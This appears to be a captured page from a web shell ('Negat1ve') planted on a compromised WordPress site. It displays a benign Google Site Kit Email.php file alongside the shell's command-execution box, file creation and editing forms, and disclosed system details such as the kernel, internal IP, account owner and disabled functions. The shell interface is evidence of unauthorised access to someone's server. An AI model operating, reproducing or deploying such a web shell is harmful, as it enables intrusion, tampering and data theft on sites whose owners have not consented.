Linux webm017.cluster127.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Apache
10.127.20.17
/
home
/
m
/
a
/
t
/
matisecojj
/
www
/
wp-content
/
plugins
/
google-site-kit
/
includes
/
Core
/
Email
[ HOME ]
Exec
Submit
Email.php
<?php /** * Class Google\Site_Kit\Core\Email\Email * * @package Google\Site_Kit\Core\Email * @copyright 2025 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Email; use WP_Error; /** * Class for sending emails with Site Kit branding. * * @since 1.168.0 * @access private * @ignore */ class Email { /** * Stores the last error from wp_mail. * * @since 1.168.0 * @var WP_Error|null */ protected $last_error = null; /** * Builds email headers with Site Kit branding. * * Fetches the filtered From email via wp_mail_from filter, * overrides the From name to "Site Kit", and merges with * caller-supplied headers. * * @since 1.168.0 * * @param array $headers Optional. Additional headers to merge. Default empty array. * @return array Final header array with Site Kit branding. */ public function build_headers( $headers = array() ) { $from_email = apply_filters( 'wp_mail_from', '' ); if ( empty( $from_email ) || ! is_email( $from_email ) ) { $from_email = get_option( 'admin_email' ); } $from_header = sprintf( 'From: Site Kit <%s>', $from_email ); if ( ! is_array( $headers ) ) { $headers = array(); } // Merge the From header with caller-supplied headers. // Place the From header first. $final_headers = array_merge( array( $from_header ), $headers ); return $final_headers; } /** * Sends an email using wp_mail with error tracking. * * Wraps wp_mail with a scoped listener for wp_mail_failed hook * to capture any errors during sending. When text_content is provided, * it will be set as the AltBody for multipart/alternative MIME emails. * * @since 1.168.0 * @since 1.170.0 Added $text_content parameter for plain text alternative. * * @param string|array $to Array or comma-separated list of email addresses to send message. * @param string $subject Email subject. * @param string $content Message contents (HTML). * @param array $headers Optional. Additional headers. Default empty array. * @param string $text_content Optional. Plain text alternative content. Default empty string. * @return bool|WP_Error True if the email was sent successfully, WP_Error on failure. */ public function send( $to, $subject, $content, $headers = array(), $text_content = '' ) { $this->last_error = null; $result = $this->send_email_and_catch_errors( $to, $subject, $content, $headers, $text_content ); if ( false === $result || $this->last_error instanceof WP_Error ) { if ( $this->last_error instanceof WP_Error ) { return $this->last_error; } $this->set_last_error( new WP_Error( 'wp_mail_failed', __( 'Failed to send email.', 'google-site-kit' ) ) ); return $this->last_error; } return true; } /** * Sends an email via wp_mail while capturing any errors. * * Attaches a temporary listener to the wp_mail_failed hook to capture * any errors that occur during sending. When text_content is provided, * uses phpmailer_init hook to set AltBody for multipart MIME emails. * * @since 1.168.0 * @since 1.170.0 Added $text_content parameter for plain text alternative. * * @param string|array $to Array or comma-separated list of email addresses to send message. * @param string $subject Email subject. * @param string $content Message contents (HTML). * @param array $headers Additional headers. * @param string $text_content Optional. Plain text alternative content. Default empty string. * @return bool Whether the email was sent successfully. */ protected function send_email_and_catch_errors( $to, $subject, $content, $headers, $text_content = '' ) { add_action( 'wp_mail_failed', array( $this, 'set_last_error' ) ); // Set up AltBody for multipart MIME email if text content is provided. $alt_body_callback = null; if ( ! empty( $text_content ) ) { $alt_body_callback = function ( $phpmailer ) use ( $text_content ) { // phpcs:ignore WordPress.NamingConventions.ValidVariableName.UsedPropertyNotSnakeCase -- PHPMailer property. $phpmailer->AltBody = $text_content; }; add_action( 'phpmailer_init', $alt_body_callback ); } $result = wp_mail( $to, $subject, $content, $headers ); // phpcs:ignore WordPressVIPMinimum.Functions.RestrictedFunctions.wp_mail_wp_mail // Clean up hooks. remove_action( 'wp_mail_failed', array( $this, 'set_last_error' ) ); if ( null !== $alt_body_callback ) { remove_action( 'phpmailer_init', $alt_body_callback ); } return $result; } /** * Sets the last error from a failed email attempt. * * This method is public because it is used as a callback for the * wp_mail_failed hook which requires public accessibility. * * @since 1.168.0 * * @param WP_Error $error The error from wp_mail_failed hook. */ public function set_last_error( WP_Error $error ) { $this->last_error = $error; } /** * Gets the last error from the most recent send attempt. * * @since 1.168.0 * * @return WP_Error|null The last error if one occurred, null otherwise. */ public function get_last_error() { return $this->last_error; } }
Submit
Copy
Back
Folder Name
Submit
File Name
File Content
Submit
System Information
Uname > Linux webm017.cluster127.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64 Software > Apache PHP > 8.1.33 Protocol > HTTP/1.1 IP / Port > 10.127.20.17 / 443 Mail > ON Curl > ON Owner > matisecojj MySQL > OFF Disable Function > _dyuweyrj4,_dyuweyrj4r,dl
*ReClick For Close
File : Negat1ve /JFR/.thumb35363/index.php
Name
Type
Size
Owner/Group
Permission
Last Modified
Actions
.
dir
-
matisecojj/users
0755
2026-01-13 06:43:48
..
dir
-
matisecojj/users
0755
2026-01-13 06:43:48
Email.php
text/x-php
5.19 KB
matisecojj/users
0644
2026-01-13 06:43:48
© Negat1ve